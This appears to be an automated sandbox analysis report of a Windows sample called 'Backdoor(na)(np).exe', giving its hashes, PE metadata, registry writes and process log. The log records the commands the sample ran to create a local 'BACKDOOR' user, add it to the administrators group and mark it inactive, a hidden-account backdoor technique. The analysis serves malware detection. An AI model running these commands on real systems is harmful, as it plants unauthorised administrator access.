| File name: | Backdoor(na)(np).exe |
| Full analysis: | https://app.any.run/tasks/f5412ae0-11d3-4189-8bba-9183dad72bca |
| Verdict: | Malicious activity |
| Analysis date: | January 02, 2024, 08:28:30 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | 984D756E307673ADD4C63212A09D4A0C |
| SHA1: | E10E5C5B74B7C2A3965217BCDD7B7A81CD303CD4 |
| SHA256: | 144777D6B76274A5599D0B8F09C5B63FCCE1882E2CBBA747D12720CF5F6FC54D |
| SSDEEP: | 6144:TkOXOCZfE1uwGMGI+EakcQgh7dCkY028Yx7ubY:TkdsfE1N/GIRl |
| .exe | | | Win32 Executable MS Visual C++ (generic) (41) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (36.3) |
| .dll | | | Win32 Dynamic Link Library (generic) (8.6) |
| .exe | | | Win32 Executable (generic) (5.9) |
| .exe | | | Win16/32 Executable Delphi generic (2.7) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2017:01:18 11:10:35+01:00 |
| ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 2.5 |
| CodeSize: | 59904 |
| InitializedDataSize: | 308224 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1000 |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.0.0.0 |
| ProductVersionNumber: | 1.0.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | Debug, Pre-release, Private build |
| FileOS: | Windows 16-bit |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | English (U.S.) |
| CharacterSet: | Windows, Latin1 |
| CompanyName: | Blackline Corp. |
| FileDescription: | Creates Backdoor (No admin rights needed)(No password) |
| FileVersion: | 1,0,0,0 |
| ProductName: | Backdoor |
| InternalName: | Backdoor |
| ProductVersion: | 1.0.0.0 |
| LegalCopyright: | XXX |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1056 | C:\Windows\system32\net1 user BACKDOOR/ADD | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1288 | net user BACKDOOR/ADD | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2032 | net localgroup administrators BACKDOOR /add | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2036 | "C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\F732.tmp\F733.bat C:\Users\admin\AppData\Local\Temp\Backdoor(na)(np).exe" | C:\Windows\System32\cmd.exe | — | Backdoor(na)(np).exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2088 | C:\Windows\system32\net1 localgroup administrators BACKDOOR /add | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2184 | "C:\Users\admin\AppData\Local\Temp\Backdoor(na)(np).exe" | C:\Users\admin\AppData\Local\Temp\Backdoor(na)(np).exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 2208 | net user BACKDOOR /active:no | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2268 | C:\Windows\system32\net1 user BACKDOOR /active:no | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2184) Backdoor(na)(np).exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2184) Backdoor(na)(np).exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2184) Backdoor(na)(np).exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2184) Backdoor(na)(np).exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2184 | Backdoor(na)(np).exe | C:\Users\admin\AppData\Local\Temp\F732.tmp\F733.bat | text | |
MD5:F480DBAB46D3DECC5FC5B547AF193CDB | SHA256:2153E5D9C4435AD65FD7515347E0707A6577547987FA514610A99917925EF5C6 | |||
| 2036 | cmd.exe | C:\Users\admin\AppData\Local\Temp\b4ckd00r\BACKDOOR.txt | text | |
MD5:B3EF898C1FA1DC38DB5FB361A13E62AE | SHA256:5C6A550ED2436880F2C51FEC41F34E8EF9F42104AA79CA62EA201EC13B59E492 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |